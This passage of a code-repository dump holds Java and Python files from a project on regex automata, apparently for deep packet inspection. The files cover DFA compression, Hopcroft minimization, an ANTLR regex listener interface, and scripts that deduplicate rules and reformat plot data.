compare(IntGraph.IntNode o1, IntGraph.IntNode o2) {\n return Integer.compare(o1.edges.size() - penalty.getOrDefault(o1.id, 0),\n o2.edges.size() - penalty.getOrDefault(o2.id, 0));\n }\n });\n queue.addAll(curNodes);\n\n List<Integer> group = new ArrayList<>();\n\n List<Integer> resultLastSet = null;\n while (!queue.isEmpty()) {\n IntGraph.IntNode cur = queue.remove();\n group.add(cur.id);\n\n// System.err.print(cur.edges.size() - penalty.getOrDefault(cur.id, 0) + \" \");\n\n List<Integer> lastSet = new ArrayList<>();\n\n cur.edges.forEach(neighbour -> {\n if (queue.remove(graph.nodes.get(neighbour))) {\n lastSet.add(neighbour);\n }\n graph.nodes.get(neighbour).edges.remove(cur.id);\n });\n\n lastSet.forEach(neighbour -> {\n// if (!queue.contains(graph.nodes.get(neighbour))) {\n// return;\n// }\n graph.nodes.get(neighbour).edges.forEach(nNeighbour -> {\n// if (nNeighbour != cur.id) {\n penalty.put(nNeighbour, penalty.getOrDefault(nNeighbour, 0) + 1);\n if (queue.remove(graph.nodes.get(nNeighbour))) {\n queue.add(graph.nodes.get(nNeighbour));\n }\n// }\n });\n });\n\n lastSet.add(cur.id);\n\n// if (queue.size() == 0) {\n// HashSet<Integer> here = new HashSet<>(lastSet);\n// lastSet.forEach(x -> {\n// long nn = graph.nodes.get(x).edges.stream()\n// .filter(here::contains)\n// .count();\n// if (nn != here.size()) {\n// System.err.println(nn);\n// System.err.println(here.size());\n//// System.err.println(cur.edges.stream().filter(here::contains).count());\n//// System.err.println(cur.id);\n//// System.err.println(x);\n//// System.err.println(cur.edges.size() - penalty.getOrDefault(cur.id, 0));\n//// System.err.println(graph.nodes.get(x).edges.size() - penalty.getOrDefault(x, 0));\n// throw new RuntimeException(\"s\");\n// }\n// });\n// }\n\n resultLastSet = lastSet;\n }\n assert resultLastSet != null;\n lastSets.add(resultLastSet);\n return group;\n }\n\n public List<List<Integer>> getLastSets() {\n return lastSets;\n }\n}\n"
},
{
"alpha_fraction": 0.43415454030036926,
"alphanum_fraction": 0.43654730916023254,
"avg_line_length": 32.885887145996094,
"blob_id": "534264f1b4b0a2f5bfb6b52d098d0df1e9445aad",
"content_id": "b12df6f04290a484bae8e34891ea4d9ebe46bbe9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 11284,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 333,
"path": "/src/main/java/automaton/algo/compressor/recursive/RecursiveCompressorOld.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.recursive;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class RecursiveCompressorOld {\n private Dfa dfa;\n private HashMap<Node, Integer> index;\n private ArrayList<Node> nodes;\n private byte[][] distinct; // -1 <-> independent, 1 <-> dependent, 0 <-> not available\n private Map<Node, Set<Pair<Character, Node>>> mp;\n private MergeGraph mergeQueue;\n\n// private byte[][] __debugDistinct;\n// private byte\n\n private byte checkInd(int i, int j) {\n if (distinct[i][j] != 0) {\n return distinct[i][j];\n }\n if (i < j) {\n int tmp = i;\n i = j;\n j = tmp;\n }\n Node a = nodes.get(i);\n Node b = nodes.get(j);\n if (a.getEdges().size() > b.getEdges().size()) {\n Node tmp = a;\n a = b;\n b = tmp;\n }\n// Node finalB = b;\n// a.getEdges().forEach((c, targetA) -> {\n for (Map.Entry<Character, Node> entry : a.getEdges().entrySet()) {\n char c = entry.getKey();\n Node targetA = entry.getValue();\n if (b.getEdges().containsKey(c)) {\n byte result = checkInd(index.get(targetA), index.get(b.getEdges().get(c)));\n if (result == 1) {\n return distinct[i][j] = 1;\n }\n }\n }\n return distinct[i][j] = -1;\n }\n\n private void buildMatrix() {\n nodes = new ArrayList<>(dfa.allNodes());\n index = new HashMap<>();\n int counter = 0;\n for (Node node : nodes) {\n index.put(node, counter);\n counter++;\n }\n\n mp = new HashMap<>();\n for (Node node : nodes) {\n mp.put(node, new HashSet<>());\n }\n for (Node node : nodes) {\n node.getEdges().forEach((c, target) -> {\n mp.get(target).add(new Pair<>(c, node));\n });\n }\n\n distinct = new byte[nodes.size()][nodes.size()];\n Queue<Pair<Integer, Integer>> queue = new ArrayDeque<>();\n\n for (int i = 0; i < nodes.size(); i++) {\n if (!nodes.get(i).isTerminal()) {\n continue;\n }\n assert nodes.get(i).getTerminal().size() == 1;\n for (int j = 0; j < i; j++) {\n if (nodes.get(i).isTerminal() && nodes.get(j).isTerminal()) {\n assert !nodes.get(i).getTerminal().equals(nodes.get(j).getTerminal());\n distinct[i][j] = 1;\n queue.add(new Pair<>(i, j));\n }\n }\n// if (nodes.get(i).isTerminal()) {\n// distinct[i][i] = 1;\n// queue.add(new Pair<>(i, i));\n// }\n }\n\n HashMap<Character, HashSet<Integer>>[] incident = new HashMap[nodes.size()];\n for (int i = 0; i < incident.length; i++) {\n incident[i] = new HashMap<>();\n }\n for (int i = 0; i < nodes.size(); i++) {\n int finalI = i;\n mp.get(nodes.get(i)).forEach(pair -> {\n incident[finalI].putIfAbsent(pair.getFirst(), new HashSet<>());\n incident[finalI].get(pair.getFirst()).add(index.get(pair.getSecond()));\n });\n }\n\n\n while (!queue.isEmpty()) {\n Pair<Integer, Integer> cur = queue.remove();\n int i = Integer.max(cur.getFirst(), cur.getSecond());\n int j = Integer.min(cur.getFirst(), cur.getSecond());\n incident[i].keySet().stream()\n .filter(incident[j]::containsKey)\n .forEach(c -> {\n incident[i].get(c).forEach(a -> {\n incident[j].get(c).forEach(b -> {\n int targetA = Integer.max(a, b);\n int targetB = Integer.min(a, b);\n if (distinct[targetA][targetB] == 0) {\n distinct[targetA][targetB] = 1;\n queue.add(new Pair<>(targetA, targetB));\n }\n });\n });\n });\n }\n for (int i = 0; i < nodes.size(); i++) {\n for (int j = 0; j < i; j++) {\n if (distinct[i][j] == 0) {\n distinct[i][j] = -1;\n// checkInd(i, j);\n }\n }\n }\n }\n\n private List<Pair<Integer, Integer>> mergePair(int aId, int bId) {\n assert !nodes.get(aId).isTerminal() : \"Found terminal: \" + nodes.get(aId).getTerminal();\n assert !nodes.get(bId).isTerminal() : \"Found terminal: \" + nodes.get(bId).getTerminal();\n ArrayList<Pair<Integer, Integer>> needsMerge = new ArrayList<>();\n Node a = nodes.get(aId);\n Node b = nodes.get(bId);\n Map<Character, Node> aEdges = a.getEdges();\n Map<Character, Node> bEdges = b.getEdges();\n\n aEdges.forEach((c, target) -> {\n if (bEdges.containsKey(c)) {\n Node conflict = bEdges.get(c);\n int conflictId = index.get(conflict);\n needsMerge.add(new Pair<>(index.get(target), conflictId));\n }\n if (target == a) {\n b.addEdge(c, b);\n } else {\n boolean removed = mp.get(target).remove(new Pair<>(c, a));\n assert removed;\n mp.get(target).add(new Pair<>(c, b));\n b.addEdge(c, target);\n }\n });\n for (Pair<Character, Node> pair : mp.get(a)) {\n pair.getSecond().addEdge(pair.getFirst(), b);\n }\n mp.get(b).addAll(mp.get(a).stream().map(pair -> {\n if (pair.getSecond() == a) {\n return new Pair<>(pair.getFirst(), b);\n }\n return pair;\n }).collect(Collectors.toSet()));\n\n nodes.set(aId, null);\n if (dfa.getStart() == a) {\n dfa.setStart(b);\n }\n return needsMerge;\n }\n\n private void mergeAll(Set<Integer> mergeSet) { // TODO: faster & parallel implementation using streams?\n int bId = mergeSet.stream().min(Integer::compareTo).get();\n mergeSet.stream()\n .filter(id -> id != bId)\n .flatMap(id -> mergePair(id, bId).stream())\n .peek(pair -> {\n if (mergeSet.contains(pair.getFirst())) {\n pair.setFirst(bId);\n }\n if (mergeSet.contains(pair.getSecond())) {\n pair.setSecond(bId);\n }\n })\n .distinct()\n .forEach(pair -> mergeQueue.addPair(pair.getFirst(), pair.getSecond()));\n// Map<Character, Node> bEdges = b.getEdges();\n// bEdges.\n//// Node b = nodes.get(j);\n//\n//// if (a == null) {\n//// while (a)\n//// }\n//\n//// assert distinct[i][j] == -1; // TODO: necessary, but not enough\n//\n// for (int i = 1; i < mergeList.size(); i++) {\n// Node a = nodes.get(mergeList.get(i));\n//\n// a.getEdges().forEach((c, target) -> {\n// int targetId = index.get(target);\n//\n// if (bEdges.containsKey(c)) {\n// Node conflictTarget = bEdges.get(c);\n// if (mergeSet.contains(index.get(conflictTarget))) {\n// conflictTarget = b;\n// } else {\n//\n// }\n// } else {\n//\n// }\n//\n// if (mergeSet.contains(targetId)) {\n// b.addEdge(c, b);\n// } else {\n// boolean removed = mp.get(target).remove(new Pair<>(c, a));\n// assert removed; // TODO: add to other implementations?\n// mp.get(target).add(new Pair<>(c, b));\n// if (bEdges.containsKey(c)) {\n// if (bEdges.get(c) == target) {\n// b.addEdge(c, target);\n// } else {\n// mergeQueue.addPair(targetId, a.getEdges().get(c));\n// }\n// }\n// }\n// });\n// for (Pair<Character, Node> pair : mp.get(a)) {\n// pair.getSecond().addEdge(pair.getFirst(), b);\n// }\n// mp.get(b).addAll(mp.get(a).stream().map(pair -> {\n// if (pair.getSecond() == a) {\n// return new Pair<>(pair.getFirst(), b);\n// }\n// return pair;\n// }).collect(Collectors.toSet()));\n// }\n//\n// nodes.set(i, null);\n// if (dfa.getStart() == a) {\n// dfa.setStart(b);\n// } // TODO: update queue\n\n // TODO: resolve conflicts && add to mergeQueue\n // TODO: hashset\n }\n\n private boolean runMerge() {\n Integer foundI = null, foundJ = null;\n for (int i = 0; foundI == null && i < nodes.size(); i++) {\n for (int j = 0; foundI == null && j < i; j++) {\n if (distinct[i][j] == -1 && !nodes.get(i).isTerminal() && !nodes.get(j).isTerminal()) {\n foundI = i;\n foundJ = j;\n }\n }\n }\n if (foundI == null) {\n return false;\n }\n\n mergeQueue = new MergeGraph(nodes.size());\n mergeQueue.addPair(foundI, foundJ);\n while (!mergeQueue.isEmpty()) {\n Set<Integer> cur = mergeQueue.getMergeList();\n mergeAll(cur);\n }\n return true;\n }\n\n public void compress(Dfa dfa) {\n dfa.close();\n this.dfa = dfa;\n\n boolean updated = true;\n while (updated) {\n buildMatrix();\n updated = runMerge();\n }\n }\n\n private static class MergeGraph {\n private ArrayList<Integer>[] graph;\n private HashSet<Integer> involved = new HashSet<>();\n private HashSet<Integer> collected;\n\n public MergeGraph(int size) {\n graph = new ArrayList[size];\n for (int i = 0; i < size; i++) {\n graph[i] = new ArrayList<>();\n }\n }\n\n\n public void addPair(int i, int j) {\n if (i == j) {\n return;\n }\n graph[i].add(j);\n graph[j].add(i);\n involved.add(i);\n involved.add(j);\n }\n\n private void traverse(int c) {\n collected.add(c);\n graph[c].forEach(x -> {\n if (!collected.contains(x)) {\n traverse(x);\n }\n });\n }\n\n public Set<Integer> getMergeList() {\n collected = new HashSet<>();\n int head = involved.iterator().next();\n traverse(head);\n collected.forEach(id -> {\n graph[id].clear();\n involved.remove(id);\n });\n return collected;\n }\n\n public boolean isEmpty() {\n return involved.isEmpty();\n }\n }\n}\n"
},
{
"alpha_fraction": 0.3625146746635437,
"alphanum_fraction": 0.36398354172706604,
"avg_line_length": 37.681819915771484,
"blob_id": "23472d9141ec71ad7c549f4d5a475ace90dfb185",
"content_id": "a7bde2b9dbcd1f553e4bf19f3597a0ff52f253a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3404,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 88,
"path": "/src/main/java/automaton/algo/compressor/heuristic/DfaCompressorOld1.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.heuristic;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class DfaCompressorOld1 {\n public void compress(Dfa dfa) {\n Map<Node, Set<Pair<Character, Node>>> mp = new HashMap<>();\n HashSet<Node> nodes = new HashSet<>(dfa.allNodes());\n for (Node node : nodes) {\n mp.put(node, new HashSet<>());\n }\n for (Node node : nodes) {\n node.getEdges().forEach((c, target) -> {\n mp.get(target).add(new Pair<>(c, node));\n });\n }\n boolean found = true;\n while (found) {\n found = false;\n List<Node> ordered = new ArrayList<>(nodes);\n for (int i = 0; !found && i < ordered.size(); i++) {\n for (int j = 0; !found && j < i; j++) {\n Node a = ordered.get(i);\n if (a.isTerminal()) {\n continue;\n }\n Map<Character, Node> aEdges = a.getEdges();\n Node b = ordered.get(j);\n if (b.isTerminal()) {\n continue;\n }\n Map<Character, Node> bEdges = b.getEdges();\n boolean failed = false;\n if (aEdges.size() >= bEdges.size()) {\n Map<Character, Node> tmp = aEdges;\n aEdges = bEdges;\n bEdges = tmp;\n Node tmp1 = a;\n a = b;\n b = tmp1;\n }\n for (Map.Entry<Character, Node> entry : aEdges.entrySet()) {\n char c = entry.getKey();\n Node target = entry.getValue();\n if (bEdges.containsKey(c) && bEdges.get(c) != target) {\n failed = true;\n }\n }\n\n if (!failed) {\n found = true;\n\n Node finalA = a;\n Node finalB = b;\n aEdges.forEach((c, target) -> {\n if (target == finalA) {\n finalB.addEdge(c, finalB);\n } else {\n mp.get(target).remove(new Pair<>(c, finalA));\n mp.get(target).add(new Pair<>(c, finalB));\n finalB.addEdge(c, target);\n }\n });\n for (Pair<Character, Node> pair : mp.get(a)) {\n pair.getSecond().addEdge(pair.getFirst(), b);\n }\n mp.get(b).addAll(mp.get(a).stream().map(pair -> {\n if (pair.getSecond() == finalA) {\n return new Pair<>(pair.getFirst(), finalB);\n }\n return pair;\n }).collect(Collectors.toSet()));\n\n nodes.remove(a);\n if (dfa.getStart() == a) {\n dfa.setStart(b);\n }\n }\n }\n }\n }\n }\n}\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 42,
"blob_id": "da26c8cd2d26d663fba29da3d4b76aaf3b4bf64b",
"content_id": "0976688f3a85469a1d5e7f9af64899146bcd8a69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 215,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 5,
"path": "/input/gen_unique.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "with open('./rules.txt') as rules:\n rules_list = rules.read().rstrip().split('\\n')\n rules_list = set(rules_list)\n with open('./unique.txt', 'w') as unique:\n unique.write(\"\\n\".join(list(rules_list)))\n"
},
{
"alpha_fraction": 0.6061157584190369,
"alphanum_fraction": 0.6126683950424194,
"avg_line_length": 33.772151947021484,
"blob_id": "5871a39c14b8fc956e90d49a80cc6bc8d1ebe683",
"content_id": "63aa3d08ae4d807d1a4e72666571c8a9698e409e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2747,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 79,
"path": "/src/main/java/util/Utils.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package util;\n\nimport java.io.BufferedReader;\nimport java.io.BufferedWriter;\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.nio.file.StandardOpenOption;\nimport java.util.Collection;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.function.*;\nimport java.util.logging.Logger;\n\npublic class Utils {\n public static char parseChar(String s) {\n if (s.startsWith(\"\\\\x\")) {\n return (char) Integer.parseInt(s.substring(2), 16);\n } else if (s.length() == 1) {\n return s.charAt(0);\n }\n throw new IllegalArgumentException(\"Unexpected char sequence to parse: `\" + s + \"`\");\n }\n\n public static Collection<Integer> testHeader(Function<String, Collection<Integer>> predicate, String s) {\n s = (char) 257 + s + (char) 256;\n Collection<Integer> result = predicate.apply(s);\n for (int i = 0; i <= s.length(); i++) {\n result.addAll(predicate.apply(s.substring(i)));\n }\n return result;\n }\n\n public static <T, X> X timeit(Function<T, X> function, T arg) {\n long pre = System.currentTimeMillis();\n X tmp = function.apply(arg);\n long post = System.currentTimeMillis();\n Logger.getGlobal().info(function.getClass().getCanonicalName() + \": \" + (post - pre));\n return tmp;\n }\n\n public static <T, V, X> X timeit(BiFunction<T, V, X> function, T arg, V arg1) {\n return timeit(function, arg, arg1, \"\");\n }\n\n private static Map<String, Long> timeLog = new HashMap<>();\n public static <T, V, X> X timeit(BiFunction<T, V, X> function, T arg, V arg1, String label) {\n long pre = System.currentTimeMillis();\n X tmp = function.apply(arg, arg1);\n long post = System.currentTimeMillis();\n// Logger.getGlobal().info(label + (post - pre));\n long timing = post - pre;\n System.err.println(label + timing);\n timeLog.putIfAbsent(label, 0L);\n timeLog.put(label, timeLog.get(label) + timing);\n return tmp;\n }\n\n public static void printTimeLog() {\n System.err.println(timeLog.toString());\n }\n\n public static void writeTo(String pathStr, String s) {\n try {\n Path path = Paths.get(pathStr);\n Files.createDirectories(path.getParent());\n BufferedWriter writer = Files.newBufferedWriter(path, StandardOpenOption.APPEND, StandardOpenOption.CREATE);\n writer.write(s);\n writer.flush();\n } catch (IOException e) {\n throw new RuntimeException(e);\n }\n }\n\n public static String objCode(Object o) {\n return o == null ? \"null\" : o.toString().split(\"@\")[1];\n }\n}\n"
},
{
"alpha_fraction": 0.5897186994552612,
"alphanum_fraction": 0.602327823638916,
"avg_line_length": 40.20000076293945,
"blob_id": "2e98060fd7759a5c35f39b41f3d742185484fe5a",
"content_id": "8e06aceb52ece87504d186e2cc6ee6ca47fcf1b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1031,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 25,
"path": "/output/reformat_plot.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "\n\nwith open('plot.txt') as plot_fs:\n a = plot_fs.readline()\n data = []\n while a:\n x = a.rstrip()\n data_lines = [plot_fs.readline().rstrip() for _ in range(7)]\n data_lines = list(map(lambda line: line.split(\": \")[1], data_lines))\n data_lines = [x] + [data_lines[i] for i in [0, 2, 5, 6]]\n data.append(data_lines)\n a = plot_fs.readline().rstrip()\n\nwith open('formatted.txt', 'w') as formatted_fs:\n for i in range(len(data[0]) - 1):\n for row in data:\n formatted_fs.write(\"({},{})\".format(row[0], row[i + 1]))\n formatted_fs.write('\\n')\n\nimport csv\nwith open('out.csv', 'w') as csvfile:\n # spamwriter = csv.writer(csvfile, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n spamwriter = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)\n index = ['x', 'Minimized', 'ThompsonModifiedHeuristic', 'ThompsonModifiedHeuristic5', 'ThompsonModifiedHeuristic10'] \n spamwriter.writerow(index) \n for row in data:\n spamwriter.writerow(row)"
},
{
"alpha_fraction": 0.7250000238418579,
"alphanum_fraction": 0.7266025543212891,
"avg_line_length": 32.196807861328125,
"blob_id": "8dac2965c13acccb8aaffe2b7665e9dcd6606d57",
"content_id": "c2e69912ac3ba189e8e8e5b2fcdb1007f38021f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 6240,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 188,
"path": "/src/main/generated/antlr/RegexListener.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "// Generated from F:/repo/java/dpi-fp/src/main/grammar\\Regex.g4 by ANTLR 4.8\npackage antlr;\nimport org.antlr.v4.runtime.tree.ParseTreeListener;\n\n/**\n * This interface defines a complete listener for a parse tree produced by\n * {@link RegexParser}.\n */\npublic interface RegexListener extends ParseTreeListener {\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#start}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterStart(RegexParser.StartContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#start}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitStart(RegexParser.StartContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#params}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterParams(RegexParser.ParamsContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#params}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitParams(RegexParser.ParamsContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#charset}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterCharset(RegexParser.CharsetContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#charset}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitCharset(RegexParser.CharsetContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#charsetRange}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterCharsetRange(RegexParser.CharsetRangeContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#charsetRange}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitCharsetRange(RegexParser.CharsetRangeContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#charsetValues}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterCharsetValues(RegexParser.CharsetValuesContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#charsetValues}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitCharsetValues(RegexParser.CharsetValuesContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#expr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterExpr(RegexParser.ExprContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#expr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitExpr(RegexParser.ExprContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#expr1}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterExpr1(RegexParser.Expr1Context ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#expr1}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitExpr1(RegexParser.Expr1Context ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#pureExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterPureExpr(RegexParser.PureExprContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#pureExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitPureExpr(RegexParser.PureExprContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#character}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterCharacter(RegexParser.CharacterContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#character}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitCharacter(RegexParser.CharacterContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#special}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterSpecial(RegexParser.SpecialContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#special}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitSpecial(RegexParser.SpecialContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#repeatedExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterRepeatedExpr(RegexParser.RepeatedExprContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#repeatedExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitRepeatedExpr(RegexParser.RepeatedExprContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#number}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterNumber(RegexParser.NumberContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#number}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitNumber(RegexParser.NumberContext ctx);\n\t/**\n\t * Enter a parse tree produced by the {@code rangeCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterRangeCounter(RegexParser.RangeCounterContext ctx);\n\t/**\n\t * Exit a parse tree produced by the {@code rangeCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitRangeCounter(RegexParser.RangeCounterContext ctx);\n\t/**\n\t * Enter a parse tree produced by the {@code lBorderCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterLBorderCounter(RegexParser.LBorderCounterContext ctx);\n\t/**\n\t * Exit a parse tree produced by the {@code lBorderCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitLBorderCounter(RegexParser.LBorderCounterContext ctx);\n\t/**\n\t * Enter a parse tree produced by the {@code rBorderCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterRBorderCounter(RegexParser.RBorderCounterContext ctx);\n\t/**\n\t * Exit a parse tree produced by the {@code rBorderCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitRBorderCounter(RegexParser.RBorderCounterContext ctx);\n\t/**\n\t * Enter a parse tree produced by the {@code exactCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterExactCounter(RegexParser.ExactCounterContext ctx);\n\t/**\n\t * Exit a parse tree produced by the {@code exactCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitExactCounter(RegexParser.ExactCounterContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#optionalExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterOptionalExpr(RegexParser.OptionalExprContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#optionalExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitOptionalExpr(RegexParser.OptionalExprContext ctx);\n}"
},
{
"alpha_fraction": 0.50018709897995,
"alphanum_fraction": 0.504865288734436,
"avg_line_length": 37.72463607788086,
"blob_id": "a97ae0e8d1314b26c01a6c83912f5e6823b40a66",
"content_id": "11fb53cf7d0a1682e94d107c9b083f73b4ae24c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5344,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 138,
"path": "/src/main/java/automaton/algo/HopcroftMinimizer.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport automaton.transition.Transitions;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.logging.Logger;\n\npublic class HopcroftMinimizer {\n private Queue<Pair<Integer, Character>> queue = new ArrayDeque<>();\n private List<Node> nodes;\n private int[] classAssigned;\n private ArrayList<Integer>[][] inv;\n private ArrayList<Set<Integer>> partition;\n\n private int __debugPartitionNextMonitorSize = 512;\n\n private void preCalc(Dfa dfa) {\n HashMap<Node, Integer> back = new HashMap<>();\n nodes = new ArrayList<>(dfa.allNodes());\n\n for (int i = 0; i < nodes.size(); i++) {\n back.put(nodes.get(i), i);\n }\n\n inv = new ArrayList[nodes.size()][Transitions.MAX_CHAR + 1];\n for (int i = 0; i < nodes.size(); i++) {\n for (int j = 0; j <= Transitions.MAX_CHAR; j++) {\n inv[i][j] = new ArrayList<>();\n }\n }\n for (int i = 0; i < nodes.size(); i++) {\n int finalI = i;\n nodes.get(i).getEdges().forEach((c, target) -> {\n inv[back.get(target)][c].add(finalI);\n });\n }\n\n int maxTerm = nodes.stream().map(Node::getTerminal).map(terminals -> {\n if (terminals.size() > 1) {\n throw new AlgoException(\"Node has more than one terminal: \" + terminals);\n } else if (terminals.size() == 0) {\n return 0;\n }\n return terminals.get(0);\n }).reduce(Integer::max).orElse(0);\n maxTerm += 2;\n\n partition = new ArrayList<>();\n for (int i = 0; i < maxTerm; i++) {\n partition.add(new HashSet<>());\n }\n classAssigned = new int[nodes.size()];\n for (int i = 0; i < nodes.size(); i++) {\n List<Integer> terminals = nodes.get(i).getTerminal();\n int targetClass;\n if (terminals.size() == 1) {\n targetClass = terminals.get(0);\n } else {\n targetClass = maxTerm - 1;\n }\n partition.get(targetClass).add(i);\n classAssigned[i] = targetClass;\n }\n\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n for (int i = 0; i < maxTerm; i++) {\n queue.add(new Pair<>(i, c));\n }\n }\n }\n\n\n public Dfa run(Dfa dfa) {\n HashMap<Set<Integer>, Integer> newTerminals = new HashMap<>();\n dfa.allNodes().stream()\n .map(node -> new HashSet<>(node.getTerminal()))\n .distinct()\n .forEach(terms -> newTerminals.put(terms, newTerminals.size() + 1));\n dfa.allNodes().forEach(node -> {\n node.setTerminal(Collections.singletonList(newTerminals.get(new HashSet<>(node.getTerminal()))));\n });\n\n preCalc(dfa);\n\n while (!queue.isEmpty()) {\n Pair<Integer, Character> splitterPair = queue.poll();\n Map<Integer, List<Integer>> involved = new HashMap<>();\n char splitter = splitterPair.getSecond();\n for (Integer classMember : partition.get(splitterPair.getFirst())) {\n for (int partitionMember : inv[classMember][splitter]) {\n int i = classAssigned[partitionMember];\n involved.putIfAbsent(i, new ArrayList<>());\n involved.get(i).add(partitionMember);\n }\n }\n involved.forEach((i, members) -> {\n if (members.size() < partition.get(i).size()) {\n partition.add(new HashSet<>());\n if (partition.size() >= __debugPartitionNextMonitorSize) {\n Logger.getGlobal().info(\"Partition size exceeded \" + __debugPartitionNextMonitorSize);\n __debugPartitionNextMonitorSize *= 2;\n }\n int j = partition.size() - 1;\n for (int member : members) {\n partition.get(i).remove(member);\n 